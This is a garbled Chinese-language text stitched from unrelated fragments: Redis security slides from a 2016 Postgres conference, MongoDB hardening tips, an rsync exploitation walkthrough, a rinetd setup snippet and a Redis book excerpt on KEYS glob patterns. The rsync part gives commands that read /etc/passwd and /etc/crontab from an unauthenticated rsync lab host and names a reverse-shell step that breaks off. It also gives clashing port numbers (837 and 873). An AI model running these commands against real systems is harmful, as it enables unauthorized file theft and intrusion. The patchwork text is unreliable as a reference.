Redis要求可信赖的用户访问其端口 Redis可在配置文件中通过bind ip限制外网访问 2016Postgres中国用户大会 Postgres Conference China 2016 中国用户大会 Redis Security--Authentication Redis提供了一个身份验证功能 Redis在配置文件中进行配置 客户端可以发送AUTH命令+密码来验证自己 Conference China 2016 中国用户大会 Redis Security --Disabling of specific commands Redis提供禁用一些高危命令 Redis的配置文件中使用rename-commond配置 Shutdown Flushall,Flushdb Select Config 设置为一个新的名字 设置为空 2016Postgres中国用户大会 Postgres Conference China 2016 中国用户大会 Redis Management Dilemmas 一个实例的密码多人使用 密码明文配置到配置文件 高危命令明文重设在配置文件 01 02 03 Redis的密码安全 2016Postgres中国用户大会 Postgres Conference China

-MongoDB 自身带有一个HTTP服务和并支持REST接口。在2.6以后这些接口默认是关闭的。mongoDB 默认会使用默认端口监听web服务，一般不需要通过web方式进行远程管理，建议禁用。修改配置文件 或在启动的时候选择 –nohttpinterface 参数 nohttpinterface=false -启动时加入参数--bind_ip 127.0.0.1 或在/etc/mongodb Rsync（remote synchronize）是一个远程数据同步工具，可通过 LAN/WAN 快速同步多台主机间 的文件，也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问，如果在配置文件中没有相关的 用户认证以及文件授权，就会触发隐患。Rsync 的默认端口为 837。 漏洞利用 环境介绍 环境搭建 目标靶机：Kali ip地址：172.16.2.250 250:873/src 利用rsync下载任意文件 利用rsync反弹shell rsync rsync://172.16.2.250:873/src/etc/passwd ./ # 下载crontab配置文件 rsync rsync://172.16.2.250:873/src/etc/crontab ./ 该环境crontab中 17 * * * * root cd / && run-parts

注意：rinetd 安装包下载地址不确保下载可用性，您可以自行搜索安装包进行下载使用。 打开配置文件 rinetd.conf。 在配置文件中输入如下内容： 说明：您可以使用 cat /etc/rinetd.conf命令来检验配置文件是否修改正确。 执行如下命令启动 rinetd。 注意 您可以通过 echo

1 其他信息 属性 值 复杂度 O(1) 版本要求 SELECT 命令从 Redis 1.0.0 版本开始可⽤。 11.2 KEYS：获取所有与给定匹配符相匹配的键 KEYS 命令接受⼀个全局匹配符作为参数， 然后返回数据库⾥⾯所有与这个匹配符相匹配的键作为结果： KEYS pattern 举个例⼦， 如果我们想要获取数据库包含的所有键， 那么可以执⾏以下命令： redis> KEYS article::* (empty list or set) -- 数据库⾥⾯没有任何以 article:: 为前缀的键 11.2.1全局匹配符 KEYS 命令允许使⽤多种不同的全局匹配符作为 pattern 参数的值， 表 11-1 展示了⼀些常⻅的全局匹配符， 并举 例说明了这些匹配符的作⽤。 表 11-1 Glob 匹配符的作⽤及其示例 匹 配 符 作⽤ 例⼦ * 匹配零个或任意 user::i[a-d] 可以匹配 user::ia 、 user::ib 、 user::ic 和 user::id ，但不能匹配 除此以外的其他字符串， ⽐如 user::ip 或者 user::ime 。 关于全局匹配符的更多信息可以参考维基百科 https://en.wikipedia.org/wiki/Glob_(programming) 或者 glob 程 序的⼿册⻚⾯： http://man7.org